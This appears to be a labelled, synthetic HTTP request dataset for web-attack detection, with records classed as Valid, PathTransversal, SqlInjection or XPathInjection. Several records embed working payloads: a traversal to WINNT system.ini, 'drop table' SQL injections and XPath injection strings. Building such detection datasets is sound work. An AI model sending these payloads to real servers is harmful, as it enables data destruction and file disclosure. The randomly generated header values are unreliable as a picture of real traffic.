GET /ihfW/mbDih/aiB/ew1BUirVQCMOj5FNq/tZQgLJKSEFANAfDV3/ChttpsETjDzbUzlP/adlLowt2/sRYSHzP/hel4ap.nsf?o69teErog5rraH=rde4sne1trac&3fshgifb7pds=a3UlGz3cJoFg&rGkcoazo=yto7Mxagmt&lirrunopt8itjdw=og&mu9=89461744&se=e&apositionxF9T8.tU9-=bcZiVfhhnt&openwGgngnhm=riompsuslth&T7cTopt=cata2md+f-i4wu&ehoanJunn=ahrzr%25mvf%5De&YreplacesQjtc=59935573&MtIPQr=%25a%2F&ejqey06sb=os&s5dkeeo=2&Wss=h HTTP/1.1
Host: www.eTioQloftm.ch
Connection: keep-alive
Accept: application/zip;q=0.0, audio/basic;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rgfN-60NU9ojt;q=0.6, aet-8, eirxdltt-sayae;q=0.0, tr-Ti;q=0.8, bd5mi-cRdT;q=0.1
Cache-Control: max-age=0
Client-ip: 241.186.166.112
Cookie: hcghokoDb=cYhk0
Cookie2: $Version="0"
Date: Sat, 26 Feb 05 20:46:06 GMT
ETag: W/"LzPQHBHapwGvrrekc"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Wed, 30 Apr 08 21:06:50 CET
If-Unmodified-Since: Sun, 08 Feb 09 17:38:49 CET
If-Match: "KllKVxorH4iq038"
If-None-Match: "0IAqx5vw_96h6q2k"
If-Range: "nzLZC1v0zGY8lxm"
Max-Forwards: 6
MIME-Version: 7.6
Pragma: i='teiil'
Proxy-Authorization: Basic cm50Zzc6TmVtYVhsdEQ=
Authorization: Basic dGljdzp0cnJldHA3OA==
Range: 0331-,4394-646932
Referer: http://h6wukesa.de/ehtb.zip
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: toddfer6Pi/8.9.3
UA-CPU: PowerPC
UA-Disp: 4170,137,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 557x3497
Via: HTTP/3.2 www.hs3gr.png, 5.6 www.maodge.shtml
Transfer-Encoding: compress
Upgrade: neh6ae/0.8, ua61t/0.4, pduRa/4.8, slsp/5.5
Warning: 115 252.241.30.131:98284 "fahxv" "Sun, 11 Jul 04 18:03:29 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 982389544
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8954
Start - Id: 45891
class: PathTransversal
GET /ts1/axs/t960xBM.3xNi2qT4g4/ar4nnore2rCaFoEH/Jq/6NRpwherevNny@WDxtermH6.css?rO=667&G0uk=group+bydt%27bSo2Nhqusiuron+s&zuAepee=77&huIo=%2Btme&fieMSEtww=qdI7+n4Upfeo8&gisCt5too=8243&uwnbfIemahvH=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&HYswgetGNbgsoundwindow.open=nge5io&net=403098610&toohpp=telaD6h HTTP/1.1
Host: 217.1.31.64
Connection: enhiooe
Accept: application/zip, application/*;q=0.8, text/xml
Accept-Charset: iso-8859-15;q=0.2
Accept-Encoding: identity;q=0.2
Accept-Language: Tmi-rtq;q=0.3, meuwediz-ubh2sIe
Cache-Control: no-store
Client-ip: 174.163.182.93
Cookie: eadr=fihaiwle;acsrrkngie=07;2YDgroup byKrM=575;MJZbaEf@j-EI=b9Otb;idlHne4lehelf=trihm;I6ftpoA%uo=mh%7Ca
Cookie2: $Version="33"
Date: Fri, 26 Dec 08 01:25:05 GMT
ETag: W/"@9PfQx8cIAjptFMfc"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Wed, 04 Jun 08 08:33:23 CET
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: "YjPVrmyfY.f2_wnQPW2-"
If-None-Match: "pF96COZNMlFL-krdDdaS"
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 567
MIME-Version: 5.1
Pragma: q=naa
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: Digest realm
Range: 58-182597,4-9
Referer: http://www.aint.it/nemtu.rar
TE: trailers
Trailer: TE
User-Agent: tndgdl6 (lh._CJ; e2KDpAuA)
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: identity
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45891
Start - Id: 42406
class: SqlInjection
GET /aepiehe1btoves4auir/7WMpNIFTKVi/l13@@W6jk9Eq/2I/aqs0asWhh8eg6lI/LDCTAJAAk%uIy/mz@5mCr@r-0.php4?wol=ATen1&vAqeathooegqt=sitlI5iiEnd&ttsS7fl1Sdlrevs=%2F%26%3F&HJNWLZeKnyRX=%27%3B+++drop+++++table++++ytoaa&nAieceteiosehti=ra3home64W&emstowssnflsr=Dw&Rd1dal=5855037&15TpMdT=areinsoopt2a&shavinghhtpassI=1eeatsdei&Aitf=TEumswesraiulm HTTP/1.1
Host: www.c7Ikt.cz:0936
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1257;q=0.9, gb2312, iso-8859-8-i;q=0.2, windows-874
Accept-Encoding: deflate, gzip;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 161.232.72.123
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="0"
Date: Wed, 29 Apr 09 20:42:51 CET
ETag: W/"@DakhjOrm.rOxbbGC"
Expect: 100-continue
From: 1tXiees@Csgv.st
If-Modified-Since: Sun, 18 Mar 07 10:37:17 GMT
If-Unmodified-Since: Sat, 15 Aug 09 06:47:05 GMT
If-Match: "-qJPpMtdJbEcP_uqU6rS"
If-None-Match: "h7O7lW7rTKaB8.iBKNo"
If-Range: *
Max-Forwards: 2027
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: JslOti auhh=xthke
Authorization: Basic ZXNkdTphYjBlYWs=
Range: -4,92807-997,-01613
Referer: http://evgse.biz/eGfdwn/behdw/jrscmaj/tu2ht/shehx8o.nsf
TE: chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/1.7 (Windows; U; Win98 2.3; ya-ee; rv:6.8.0) Gecko/22130422
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: gzip
Upgrade: 2ac/9.1, rwme/4.7
Warning: 593 www.ibdmueus.shtml "Egye9eoeioV6AwrcnL" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42406
Start - Id: 22437
class: Valid
GET /bpaii/rmcnlhaagt9/nySlNiie6/bodyOc/r7CcW7V@qL/t8royae/ndfh51bpwutoopwse/i4sa.css? HTTP/1.0
Host: 211.14.89.135
Connection: close
Accept: video/quicktime, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 128.168.48.199
Cookie: rovReer7shu=5492211;0P8i3Mi=0he8ownym7Enot;pynldxiiteg='~eifbgsound;5q homessvare
Cookie2: $Version="35"
Date: Thu, 13 Oct 05 12:01:20 CET
ETag: "xa-zMNeKb3jW4Lg6"
Expect: eiwug=lr9eHre;lmbhn=e9dc5hmt
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Sun, 07 Mar 04 02:54:31 CET
If-Unmodified-Since: Fri, 05 Oct 07 20:01:04 CET
If-Match: "s@6rix1RVJdW3mH"
If-None-Match: "qxDDYcMhDgYooKwM"
If-Range: Fri, 17 Feb 06 18:11:11 UTC
Max-Forwards: 499
MIME-Version: 0.7
Pragma: o3l8rSpa=nivpswe
Proxy-Authorization: Basic TzNkcjpsODF0VG8=
Authorization: ma3t toeNdfmz=thfe5
Range: 6444-70796,874-
Referer: http://rreet.cz/9catbao/8snarr5d.pl
TE: chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: lecrHoer0Sa
UA-CPU: x86
UA-Disp: 9457,606,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 112x1566
Via: 2.0 www.eEicyun.png
Transfer-Encoding: compress
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 736 www.eLwneah.shtml "l38ruhse" 
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22437
Start - Id: 49160
class: XPathInjection
GET /O1ahWiFoasawansw0fal/iDezac8wmta3srvrA/eulYF-G/ne8lxuN1i/in49@@hv5gjSD_rzX_.nsf?wp-9OP=Naleg&uo=yrgmfwindow.openey&oiwnoo94mstn=ia%40%3Bgt1tlti&unr7re=soce1wccwhmaqn&ustkUlgmo=mQLfvNpu&aaz7=eo%27++or++%28i++%3C+++++count%28oofEap%2Fchild%3A%3Atext%28%29%29++++and+++j+%3C+++count%28hhtntb%2Fchild%3A%3Acomment%28%29%29++and+k+++++%3C++++count%28to%2Fchild%3A%3A*%29++++%29++++or+++%27sh6%27++++%3D%27++q2mje%27+++or HTTP/1.1
Host: 106.55.16.16:91239
Connection: close
Accept: video/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: owtjlwA='eape'
Client-ip: 38.175.250.11
Cookie: nledc=96;hle=io96RU95j
Cookie2: $Version="585"
Date: Tue, 28 Feb 06 10:10:48 CET
ETag: "JRiumqeHdoOse.-"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Sun, 19 Sep 04 14:57:59 CET
If-Unmodified-Since: Sun, 20 Jul 08 21:57:27 GMT
If-Match: "0RYhKtFgl@DG.dlBDTr"
If-None-Match: "uLyRHl6Vyb3jBji5ZbXM"
If-Range: *
Max-Forwards: 870
MIME-Version: 5.8
Pragma: yEweamfG='67'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: ptad c8aietA=roddisd
Range: -441207,31726-,-3
Referer: http://74yrRe.fr/ehawe/5htfm.swf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.0 (Machintosh; U; PPC 4.0; hr-h2; rv:9.8.4) Gecko/87304894
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7758x5013
Via: 0.8 93.191.229.251, HTTP/0.5 62.35.78.138:8, FTP/3.4 167.114.68.175
Transfer-Encoding: compress
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 017399203750342
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49160
Start - Id: 18595
class: Valid
GET /dwidnawyifhajoOsi/sXFp7mCQ9oS1X0fNU/cLqrk0YR8LPKXX/nu9Cv_/alo@vsY/dfjriTt9/YDdhGS/spayctt/ceU14a7yedn4Nsa/qXQnKljZS-nABu.png?nntiqnn=+d&hr=trdocumentip73betweeno%24sa+scripte8&rSPNkl.between4H=httpeRe2&rJlotsE=rHl&urd=Iid&nrjaLs=u8jXbV&endtovds3U=96189&fPOchT32noiys=iast%27&4m-D=nNraH&ousoysp8=105&ytshryatgfegc=r+%24e&BUwgetG3access_log3e=e0ILipNAEa.Z HTTP/1.0
Host: 81.65.10.153
Connection: close
Accept: video/mpeg
Accept-Charset: iso-8859-6, cp-932;q=0.0
Accept-Encoding: 
Accept-Language: ut1-o, cptRdsvn-peweswsc
Cache-Control: no-transform
Client-ip: 253.22.112.99
Cookie: KSVnDSVS@._=iesqdnpjn2S29ta;snn886r=execrbodyak2es%a
Cookie2: $Version="71"
Date: Tue, 31 Aug 04 21:48:46 CET
ETag: "vWm7vOC-z_8BLqnHk.@U"
Expect: 7xlr=7rgetne;T8mih
From: tyie@t8hupt4y.biz
If-Modified-Since: Sat, 24 Jun 06 06:24:25 CET
If-Unmodified-Since: Thu, 10 Jul 08 01:45:26 CET
If-Match: "VIx98_4XQ1Ji4kmmf"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 6.0
Pragma: to=n
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: Digest cnonce="iadi"
Range: 0-15536,8-008663
Referer: http://www.swoeeoye.st/8ss3di/nahaae/EnriGl.jsp
TE: deflate;q=0.2,deflate;q=0.9,chunked;q=0.4
Trailer: If-Range
User-Agent: hacremh1tt/2.9
UA-CPU: StrongARM
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 924x1764
Via: FTP/8.1 www.oeHas.png
Transfer-Encoding: cLsn
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 224 www.anwi.tiff:36 "snstrTt" "Mon, 04 Jun 07 16:58:27 GMT"
X-Forwarded-For: 84.119.251.98
X-Serial-Number: 74074067
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18595
Start - Id: 31428
class: Valid
GET /dO/g0xgkRx/laleaa1Bgternesidoem/tl/%u@0ihLLinputH@aIj/n5ltdtRv/bs5/cmdWH/QgxCd1IpelocationIxp_m/s4Us5nazaDzw/r5eenneeetvw8rt/AMQtg.css?woaupu=uovke8siMejihuc&nVeW3=nrne7&7Mnx7=60811&qBf3_lzstyleg=ozCh&iogelp=3408350&idrtbcYGm=winntamu5rssenimgd&naO7ldedheso2a=519482084 HTTP/1.0
Host: 219.249.236.197:3
Connection: atUaroan
Accept: audio/*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: 6sIltk-0ow, 0ntdssdf-td, ifi-Vttnman1, RhUoe-tieebmnn;q=0.2, obwtOna-4lo0ie9;q=0.8
Cache-Control: only-if-cached
Client-ip: 84.151.240.11
Cookie: izeqrrI=8;NkVEC=3;loMoeg8=tqkD;vtszre=izzsu21ya
Cookie2: $Version="82"
Date: Wed, 19 Dec 07 13:59:51 GMT
ETag: W/"vwuPwnzIuRYiFKz6Mt@"
Expect: 100-continue
From: vconid@sswn.net
If-Modified-Since: Wed, 30 May 07 04:03:06 GMT
If-Unmodified-Since: Mon, 30 Jun 08 16:05:37 GMT
If-Match: "FFclgDtgwpekeYyJO"
If-None-Match: *
If-Range: Sun, 21 Jan 07 11:42:03 CET
Max-Forwards: 7
MIME-Version: 2.0
Pragma: rsa=r
Proxy-Authorization: NTLM aGRvZDZseWxucWFtZXZhdGFzOWV0a2FtdHlhZWVlYWw1RTc5MW50aXJpdHV1
Authorization: 2eid elr1d=tzhrx0jd
Range: -723,550-
Referer: /lxpen/hniT/9anlns/2ti7ue.txt
TE: trailers,trailers
Trailer: Via
User-Agent: kg0iNYEh http://www.remti.net
UA-CPU: PowerPC
UA-Disp: 887,1676,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4140x395
Via: aaaf/3.3 www.orntme.jpg
Transfer-Encoding: identity
Upgrade: wptde/7.7, 5sb/8.6
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 102.76.222.209
X-Serial-Number: 886445544
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31428
Start - Id: 25223
class: Valid
GET /cMptmp/tp4NTt7@4h4Qj3i/afBwhered3iqoRqDwindow.openobject/aAeEs0cZrarr/iZ.swf?oyaorentk37he=346349&NSwvPnNoCw5A=hjV%40fy&6jsn2rformTGOo=%40O&bI=8422&osbkneqoerh=o+y+&yhtilaa=waa8aeh+q8otTl HTTP/1.1
Host: 99.43.118.145
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh, x-mac-japanese, iso-8859-9;q=0.5, windows-1253, iso-8859-9
Accept-Encoding: gzip, deflate;q=0.7, gzip, compress;q=0.4, gzip;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 188.84.7.22
Cookie: 9shw=pTe1c;lco20aei=595;e6H=]t;eehznb=35177036;rG-GLmTxZ=3537413
Cookie2: $Version="7"
Date: Fri, 05 Jun 09 10:18:35 UTC
ETag: W/"9@I4d6_H7UPz_6.aVxtR"
Expect: Eieo7sz
From: k4NgNry@tf92Cos.be
If-Modified-Since: Thu, 26 Mar 09 13:38:59 CET
If-Unmodified-Since: Mon, 25 Apr 05 06:57:44 CET
If-Match: "bF4RxVnguYuhaVJp-N"
If-None-Match: "EdZsGS.lG-COp@T51pMR"
If-Range: Tue, 07 Mar 06 07:46:47 CET
Max-Forwards: 2149
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: rthm icdu=lp1Ayatd
Range: -18637,7-
Referer: http://www.tgagtq.net/pShr/asamaat/vM1etj/vTnssa/detha.gif
TE: trailers
Trailer: From
User-Agent: 5Eaero (nCQGBd; e3zsWrT)
UA-CPU: x86
UA-Disp: 468,067,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 386x0963
Via: aqeisE/6.7 224.216.230.219
Transfer-Encoding: identity
Upgrade: rrtpr/5.4
Warning: 490 www.n7rtrte.htm "6nrmt" 
X-Forwarded-For: 223.126.236.126
X-Serial-Number: 39906730696975900354
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25223
Start - Id: 35538
class: XPathInjection
PUT /tct19VZ/aj91I/Qu.php? HTTP/1.0
Content-Length: 290
Content-Language: aO,5of9nr
Content-Encoding: compress
Content-Location: /idom.jpeg
Content-MD5: bGtzZG5uZW40Zk9tYW1kUg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jan 04 16:37:57 UTC
Last-Modified: Mon, 13 Mar 06 06:07:47 UTC
Host: 131.162.116.237:80
Connection: keep-alive
Accept: video/*, text/*;q=0.3
Accept-Charset: windows-1250;q=0.4, windows-874;q=0.2, cp-936;q=0.7, utf-7
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 0.8.80.214
Cookie: hb=uektn:tsnn|g;bvfe6onQmWReeU=t12Zz--BL1
Cookie2: $Version="80"
Date: Tue, 12 Feb 08 24:32:38 UTC
ETag: "gXOT@1LT1XonrRqHV.s"
Expect: 100-continue
From: Q6fua@alfpse.net
If-Modified-Since: Sun, 20 Jan 08 13:06:43 UTC
If-Unmodified-Since: Tue, 24 Jan 06 01:48:20 CET
If-Match: "6eCNHQzjAurm-N8pVwI7"
If-None-Match: "-M4BiRbKBQUE.AaHz"
If-Range: *
Max-Forwards: 90
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest algorithm=MD5-sess
Range: 7-26018,971548-,-1
Referer: /uoEMSi/uvcmro8a/Ejtsi5Yu.php4
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/1.6 (compatible; MSIE 8.7; Win98; Eyuflo)
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: wwfubf/2.3 225.79.153.111
Transfer-Encoding: gzip
Upgrade: rqh/0.3, h5Re/1.2, 2i9ytr/6.7, dnnc/3.7, eie/9.3
Warning: 074 www.hio17hmp.gif "oloAfT" 
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ea=e3y&r0eoN3o8i1ej=16435793&nswaOsoc=zroodrran&lebgmfd8n5aBhc=e1GJZ1&ehaemoy=67185  or    1<  6ydbao/rinoi/toiot/child::text()[position()=75]  or  3476='] | /* | /foo[bar='&oart=5AjQW7kcrAZ&nrlrd89i=ig4lJMzv-&uBtlsnosEtugs=|raeiw-f6i umZOc9e

End - Id: 35538
Start - Id: 41813
class: SqlInjection
GET /bt/tEO47g0qqKtuoAUMVKfG.htm?esit=2vRcttW&baaeybsnen0=ltedc&Caoakr=0425658772&sical=%27%3B++drop+++table+admin HTTP/1.0
Host: www.2oeqysrng6.fr:4
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=7
Client-ip: 209.250.197.168
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="4"
Date: Thu, 31 Mar 05 09:16:37 CET
ETag: "Dd5MBEp1RkTm.bHVt"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 06 Apr 06 21:41:49 UTC
If-Unmodified-Since: Wed, 13 Jan 10 11:39:41 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 18 May 06 22:06:37 CET
Max-Forwards: 8005
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM cndwb3RsbDd0ZGh1MGpudWRhYXFkcmVpaWFhZWJhaTZpbm9sZVVBdHV0NXI2ZGE=
Authorization: NTLM czB1NG9hYjd0b3RmcnQ4ZWRlZW5venRpNGVyZWl6c254YXNlZXpmbg==
Range: 340098-821
Referer: /bxiRnei/4ans.jsp
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: cees/9.9.1.2
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: mI9usm/2.8 23.94.88.132:8103, yoaha/8.9 82.198.197.180, 2.0 112.134.185.229:77
Transfer-Encoding: deflate
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41813
Start - Id: 16134
class: Valid
GET /nUdremt/ekt/location@GjXvroYT.pzG.css?qvS=bid&a7ihaerbiu=eNZ%40li&pdoyat=137085&2aw7keu=ardlxomo&6aSos=ly+%3E&aeR=485254&sahpgayosefBe=bseer HTTP/1.1
Host: www.ucdnr1o.st:990
Connection: close
Accept: application/x-tar;q=0.0, video/*, video/*
Accept-Charset: windows-1250;q=0.7, x-mac-chinesesimp;q=0.7, cp-950
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.7
Cache-Control: x6rMen='eAasCjam'
Client-ip: 44.86.112.81
Cookie: olgOdie=hjFr;wnsgd7R=24245724;lyt=3348;rannhj=ithei6M26qryem3
Cookie2: $Version="37"
Date: Fri, 24 Apr 09 07:21:17 CET
ETag: W/"@@Ao_oS1B2xROh_kXJ"
Expect: 100-continue
From: e1imeiR@cgsaTxypc.st
If-Modified-Since: Wed, 18 Apr 07 19:41:49 GMT
If-Unmodified-Since: Sun, 01 May 05 19:43:11 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Nov 08 01:35:36 CET
Max-Forwards: 2
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="PcngeE"
Authorization: NTLM YzBmbWd2bnFlbzc1YnNkbHRwdDhlbnJhbjh0dGF2cDdoQXRpY25jc3MzYXk=
Range: 396-,06-480,6-
Referer: /tiseg/v3hts2o/tk2earou/asptoa.ace
TE: gzip,deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/9.6 (Machintosh; U; PPC Mac OS X 7.5; lz-rn; rv:9.9.4) Gecko/04048637
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 846x8936
Via: HTTP/8.3 89.191.61.83, 9.5 www.yathI.shtml:1996, 1.7 www.earcdt7.jpg
Transfer-Encoding: deflate
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 701 7.138.6.62 "rfLcImnf" "Wed, 28 Jan 09 11:52:05 UTC"
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 38500847837
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16134
Start - Id: 19798
class: Valid
GET /is/JMTWSC5qPyDKJyX/gep/cu6nlootprea16eloodt/dyRs_obEJZu-k/w3SmCiDD/gL/tQW6P.C/3JmejO@YetcIA/hTSa3fd@BsTQXXllE.aspx?fdeA08fa=mdevnwh2tiri HTTP/1.0
Host: 128.156.90.32
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.5, deflate, deflate, identity;q=0.3
Accept-Language: *
Cache-Control: max-stale=13257
Client-ip: 4.120.1.21
Cookie: ehikao3B2iuro=w4rstllMl7ep7e;5aE=gnesSdilnhEaf3t;ai=e s<msseoue4;ontEt=8588;T21kamibnd=57749;qtnE=929
Cookie2: $Version="98"
Date: Tue, 03 Nov 09 08:55:39 GMT
ETag: W/"q5Y8GQwoEYb9_XY8"
Expect: eupddlzx
From: ilotit@a0vnis.fr
If-Modified-Since: Sat, 14 Jun 08 03:05:16 GMT
If-Unmodified-Since: Thu, 01 Oct 09 11:27:06 GMT
If-Match: "SgQEobL2wB514kB"
If-None-Match: *
If-Range: Fri, 06 Apr 07 20:09:38 CET
Max-Forwards: 1716
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic c3Q3dGx0OmFpaHBzc3k=
Authorization: Basic bXlubWE3ejE6aWZtbnltbw==
Range: 3017-674,55841-,-176
Referer: http://www.repfte.gov/l7ihh7dB/dSdi/eosiSd/ivrHnl.jsp
TE: chunked;q=0.6,trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/8.9 (X11; U; Open BSD i386 1.6; En-di; rv:2.4.1) Gecko/93016336
UA-CPU: 68000
UA-Disp: 881,593,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9755x916
Via: FTP/1.4 www.eaeHha.png, FTP/1.9 69.156.199.99
Transfer-Encoding: identity
Upgrade: saa/5.6, eixi/8.0, q2nz4/6.0, 8veo/1.9
Warning: 702 229.105.183.134 "ecnLurn" 
X-Forwarded-For: 151.180.14.8
X-Serial-Number: 09282554265324
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19798
Start - Id: 30058
class: Valid
GET /agtpassthruZE0nImochay/3gzkc9buYSZIS/hhszicnwaenl0/GcP6rcbB/nd81l@Pe@Sb6jO/h5osdtmsG6jtza1oNV/dcr1euIuUAdidaooI.mspx?Otesie5=0%28s&aastnetk7mt4=16365581&aotdcestbnuvf=0536&rvi7a7fniceBB=320&beirj8wauaj=3469644378&jpassthruM-tacceptaQb=iXnlk&Fhs0et=pdiatiumivoadminfSr&yntnOitssy=n+&e5tItEduloaI6pc=iayutyas5ebgrAi&ltiic1gysats=od HTTP/1.1
Host: 182.232.154.45
Connection: hsroEbt9
Accept: application/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: s-ahofr, uOreqM-lvnmmte, u-rrr, Pa7nnIk-hlDr5;q=0.3, teY4Au-slu;q=0.3
Cache-Control: no-store
Client-ip: 21.39.235.102
Cookie: qsiaNc8Unssb=Eleyltne7otilfrompechos5<
Cookie2: $Version="16"
Date: Fri, 01 Feb 08 15:41:29 UTC
ETag: "X4X3wSkRbcqHJDFv7fQ"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Thu, 26 Nov 09 21:14:13 UTC
If-Unmodified-Since: Fri, 20 Apr 07 10:09:39 CET
If-Match: "_S0avHqcw.w3Xp4"
If-None-Match: *
If-Range: *
Max-Forwards: 74
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM c3R0aGhucHN5ZUczYXJoY3I2Tmw5MW9yb3JvcnRvc2RUaW90
Range: 801-,-797
Referer: /sotpnTim/ssewrGco.png
TE: trailers,gzip
Trailer: Referer
User-Agent: Mozilla/2.5 (compatible; daS6htrlr; Linux i586; boehuaG; rNcytrtn57; hossanooaO)
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8553x7465
Via: t00Fs/8.7 www.M0uTld.htm, 2.8 255.89.169.43, FTP/4.3 www.iNyt.html:9
Transfer-Encoding: deflate
Upgrade: batwt/6.7
Warning: 581 www.tnjva9ml.shtml:8444 "e1srtmxWdaoorc7sra" 
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 243330147588053404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30058
Start - Id: 3521
class: Valid
GET /41C5An6yI/haatolieihsumrk8iS/naksh.gif?uapPsirweeaeon=enph-lenee&sfeeade4onmgi=Zei9Mlt8flnn&teb=o%7C0an&qco3oihtE8ct=5easimg&tnu6scotdyrslee=shtsanetcA HTTP/1.0
Host: www.amndscT.fr
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=59
Client-ip: 100.5.164.201
Cookie: 7eis=48137;mtDaObewoais=rc:hg;BWQQmeta_libK1G=963;lnesj=rou0nfzl
